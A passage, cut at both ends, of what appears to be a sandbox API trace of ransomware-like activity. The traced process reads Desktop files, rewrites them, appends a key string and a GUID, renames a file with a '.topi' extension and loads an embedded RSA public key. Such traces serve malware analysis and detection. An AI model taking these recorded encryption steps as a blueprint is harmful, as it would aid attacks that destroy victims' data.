| out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f22b0 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f22f8 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.904] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9708 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d96f0 [0095.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.906] GetCurrentThreadId () returned 0x8c4 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6fa0 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.906] GetCurrentThreadId () returned 0x8c4 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9720 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f22f8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.909] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1376e, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1376e, lpOverlapped=0x0) returned 1 [0095.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.910] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x13773, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.910] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.910] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.910] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.910] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.910] CloseHandle (hObject=0x6a8) returned 1 [0095.911] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.912] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\MFSr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\mfsr.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\MFSr.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\mfsr.png.topi")) returned 1 [0095.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.912] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.914] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.914] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9526d820, ftCreationTime.dwHighDateTime=0x1d5b86b, ftLastAccessTime.dwLowDateTime=0x7e321280, ftLastAccessTime.dwHighDateTime=0x1d5c36d, ftLastWriteTime.dwLowDateTime=0x7e321280, ftLastWriteTime.dwHighDateTime=0x1d5c36d, nFileSizeHigh=0x0, nFileSizeLow=0x176fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ou N_tIXZ_9N6u85h.ods", cAlternateFileName="OUN_TI~1.ODS")) returned 1 [0095.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.914] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\Ou N_tIXZ_9N6u85h.ods") returned=".ods" [0095.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\Ou N_tIXZ_9N6u85h.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\ou n_tixz_9n6u85h.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.914] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=95995) returned 1 [0095.914] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.917] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x176d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.917] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.918] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.918] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x176fb, lpOverlapped=0x0) returned 1 [0095.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.919] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.919] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.919] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.919] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.919] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, 